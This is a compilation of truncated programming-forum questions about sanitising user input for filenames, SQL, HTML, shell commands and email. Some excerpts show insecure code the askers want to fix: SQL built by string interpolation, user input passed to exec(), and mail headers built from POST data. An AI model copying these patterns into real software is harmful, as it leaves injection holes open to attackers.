I have a string that I want to use as a filename, so I want to remove all characters that wouldn't be allowed in filenames, using Python. I'd rather be strict than otherwise, so let's say I want to retain only letters, digits, and a small set of other characters like "_-.() ". What's the most elegant solution? The filename needs to be ...
I recently have been moving a bunch of MP3s from various locations into a repository. I had been constructing the new file names using the ID3 tags (thanks, TagLib-Sharp!), and I noticed that I was getting a System.NotSupportedException: "The given path's format is not supported." This was generated by either File.Copy() or Directory.Cre...
I am inserting some text from scraped web into my database. some of the fields in the string have unprintable/weird characters. For example, if text is "C__O__?__P__L__E__T__E", then the text in the database is stored only as "C__O__" I know about h(), strip_tags()... sanitize, ... etc etc. But I do not want to sanitize this SQL. Th...
I'm looking for a way to sanitize input that I paste into the browser, is this possible to do with jQuery? I've managed to come up with this so far: $(this).live(pasteEventName, function(e) { // this is where i would like to sanitize my input return false; } Unfortunately my development has come to a screeching hold because of this...
To clarify, I want to check for valid characters. For first name, last name I want to check for [A-Za-z]. For Email I want to check for chars valid for email. What algorithm would I use to CHECK user input? Specifically, I'd like to CHECK the user's first name, last name and email address for valid characters before I add to database. ...
This feels like it should be an easy one, but I'm having trouble cleaning out the newline character in content pasted from Microsoft Word. Not a full line-break, but the CTRL ENTER character that shows up as a return arrow in Word. I've tried chr(10), chr(13), \u000D, \u000A and a few others, but I can't match it in a string.replace(). S...
I have this code: $query = "select id from votes where username = '$user' and article_id = $this->id"; I tried this code to sanitize it: $query = sprintf("select id from votes where username = '$user' and article_id = $this->id", mysql_real_escape_string($user), mysql_real_escape_string($password)); but I get this error ...
I'm coding a web interface to a horrible piece of propitiatory software our company uses. the software has no real UI and requires us giving putty access to our system for our clients to even pull data. My web interface has to run an exec(); function and it has to pass a few variables the user inputs. $command = "report-call '$type' '$s...
I would like to interface a php page to the linux command line program ping. I realize that there are sanitation issues. Is there a builtin library or function that can take care of everything, or will I have to rely on regex parsers? ...
Hola When outputting user input I use this function: function bbkoda($text) { $text = htmlspecialchars($text); $text = nl2br($text); $hitta = array( "'\[b](.*?)\[/b]'is", "'\[i](.*?)\[/i]'is" ); $byt = array( "<b>\\1</b>", "<i>\\1</i>" ); $text = preg_replace($hitt...
Is it dangerous thing to view access log without sanitizing via web browser? I am considering to record access log, and I am considering to view it via wev browser, but if attacker modifies his remote host or user agent or something, can he attack to me? By inserting attacking code into his remote host or user agent or ect. So do I ne...
I have a simple PHP mailer script that takes values from a form submitted via POST and mails them to me: <?php $to = "[email protected]"; $name = $_POST['name']; $message = $_POST['message']; $email = $_POST['email']; $body = "Person $name submitted a message: $message"; $subject = "A message has been submitted"; $headers = 'From: ' ....
Hi, I am working on a directions service where users enter the from and to addresses and get the directions table ( that gives turn by turn information ) along with a map showing the route. Below is the complete source code ( getdirections.php ): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm...
I need to create a simple search but I can't afford to use Sphinx. Here's what I wrote: keywords = input.split(/\s+/) queries = [] keywords.each do |keyword| queries << sanitize_sql_for_conditions( "(classifications.species LIKE '%#{keyword}%' OR classifications.family LIKE '%#{keyword}%' OR ...
Hi there, I'm looking for advice on how to clean submitted html in a web app so it can be redisplayed in future with out styles or unclosed tags wrecking the layout of an app. On my app rich HTML is submitted by users with YUI Rich text editor, which by default runs a few regexps to clean the input, and I'm also calling the [filter_M...
I'm working on a Rails application and I would like to know what's the best way to strip blocks of CSS or JavaScript. <style> ... </style> -or- <script> ... </script> I'm using the *strip_tags* helper to take care of most of the HTML, but it leaves a bunch of CSS when the content contains inline CSS. Thanks ...
This question is based on this thread. Do you need the explicit sanitizing when you use pg_prepare? I feel that pg_prepare sanitizes the user's input automatically such that we do not need this $question_id = filter_input(INPUT_GET, 'questions', FILTER_SANITIZE_NUMBER_INT); Context where I use Postgres $result = pg_prepare($dbco...
As I prepare to tackle the issue of input data filtering and sanitization, I'm curious whether there's a best (or most used) practice? Is it better to filter/sanitize the data (of HTML, JavaScript, etc.) before inserting the data into the database, or should it be done when the data is being prepared for display in HTML? A few notes: ...
I am working on finding a good way to make user submitted data, in this case allow HTML and have it be as safe and fast as I can. I know EVERY SINGLE PERSON on this site seems to think http://htmlpurifier.org is the answer here. I do agree partially. htmlpurifier has the best open source code out there for filtering user submitted H...
I have coded the next function. But surely someone has a more elegant way to perform this task. /** * * HTML 4 Specification * ID and NAME tokens must begin with a letter ([A-Za-z]) and may be followed by any number * of letters, digits ([0-9]), hyphens ("-"), underscores ("_"), colons (":"), and periods ("."). * @param s * @re...